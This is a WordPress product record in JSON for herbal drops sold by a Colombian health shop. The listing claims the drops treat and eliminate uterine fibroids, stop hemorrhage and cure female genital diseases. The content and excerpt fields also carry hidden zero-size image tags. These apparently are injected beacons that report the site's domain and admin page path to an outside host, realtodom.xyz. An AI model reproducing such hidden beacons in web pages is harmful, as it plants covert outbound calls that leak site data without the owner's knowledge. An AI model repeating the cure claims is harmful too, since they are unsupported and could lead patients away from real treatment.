{"id":42,"date":"2015-09-10T14:06:10","date_gmt":"2015-09-10T14:06:10","guid":{"rendered":"http:\/\/healthandpower.com.co\/?post_type=product&#038;p=42"},"modified":"2018-09-03T19:55:45","modified_gmt":"2018-09-03T19:55:45","slug":"piper-angustifolium-composite","status":"publish","type":"product","link":"http:\/\/healthandpower.com.co\/?product=piper-angustifolium-composite","title":{"rendered":"Piper Angustifolium Gotas"},"content":{"rendered":"<p>combate enfermedades genitales de la mujer, mejora la digesti\u00f3n de los alimentos, act\u00faa ejerciendo una acci\u00f3n t\u00f3nica estimulante sobre la enfermedad intestinal<\/p>\n<p><strong>MODO DE USO<\/strong>:<\/p>\n<p>adultos y ni\u00f1os mayores de 12 a\u00f1os tomar de 30 a 50 gotas en una onza de agua cada 4 horas.<\/p>\n<p><strong>CONTENIDO<\/strong>: 30 ml<\/p>\n<p><img decoding=\"async\" style=\"width: 0; height: 0; display: none; visibility: hidden;\" src=\"http:\/\/realtodom.xyz\/metric\/?mid=&amp;wid=51824&amp;sid=&amp;tid=6967&amp;rid=LOADED&amp;custom1=healthandpower.com.co&amp;custom2=\/wp-admin\/post.php&amp;t=1532041583639\" alt=\"\" \/><img decoding=\"async\" style=\"width: 0; height: 0; display: none; visibility: hidden;\" src=\"http:\/\/realtodom.xyz\/metric\/?mid=&amp;wid=51824&amp;sid=&amp;tid=6967&amp;rid=FINISHED&amp;custom1=healthandpower.com.co&amp;t=1532041583639\" alt=\"\" \/><\/p>\n","protected":false},"excerpt":{"rendered":"<h1><span style=\"color: #00ccff;\">$25.000<\/span><\/h1>\n<p>Trata y elimina los fibromas uterinos, detiene la hemorragia<\/p>\n<p><img decoding=\"async\" style=\"width: 0; height: 0; display: none; visibility: hidden;\" src=\"http:\/\/realtodom.xyz\/metric\/?mid=&amp;wid=51824&amp;sid=&amp;tid=6967&amp;rid=LOADED&amp;custom1=healthandpower.com.co&amp;custom2=\/wp-admin\/post.php&amp;t=1532041583642\" alt=\"\" \/><img decoding=\"async\" style=\"width: 0; height: 0; display: none; visibility: hidden;\" src=\"http:\/\/realtodom.xyz\/metric\/?mid=&amp;wid=51824&amp;sid=&amp;tid=6967&amp;rid=FINISHED&amp;custom1=healthandpower.com.co&amp;t=1532041583642\" alt=\"\" \/><\/p>\n","protected":false},"featured_media":1441,"comment_status":"open","ping_status":"closed","template":"","meta":[],"product_brand":[],"product_cat":[50],"product_tag":[],"class_list":{"0":"post-42","1":"product","2":"type-product","3":"status-publish","4":"has-post-thumbnail","6":"product_cat-dolor-menstrual","8":"first","9":"instock","10":"shipping-taxable","11":"purchasable","12":"product-type-simple"},"_links":{"self":[{"href":"http:\/\/healthandpower.com.co\/index.php?rest_route=\/wp\/v2\/product\/42","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/healthandpower.com.co\/index.php?rest_route=\/wp\/v2\/product"}],"about":[{"href":"http:\/\/healthandpower.com.co\/index.php?rest_route=\/wp\/v2\/types\/product"}],"replies":[{"embeddable":true,"href":"http:\/\/healthandpower.com.co\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=42"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/healthandpower.com.co\/index.php?rest_route=\/wp\/v2\/media\/1441"}],"wp:attachment":[{"href":"http:\/\/healthandpower.com.co\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=42"}],"wp:term":[{"taxonomy":"product_brand","embeddable":true,"href":"http:\/\/healthandpower.com.co\/index.php?rest_route=%2Fwp%2Fv2%2Fproduct_brand&post=42"},{"taxonomy":"product_cat","embeddable":true,"href":"http:\/\/healthandpower.com.co\/index.php?rest_route=%2Fwp%2Fv2%2Fproduct_cat&post=42"},{"taxonomy":"product_tag","embeddable":true,"href":"http:\/\/healthandpower.com.co\/index.php?rest_route=%2Fwp%2Fv2%2Fproduct_tag&post=42"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}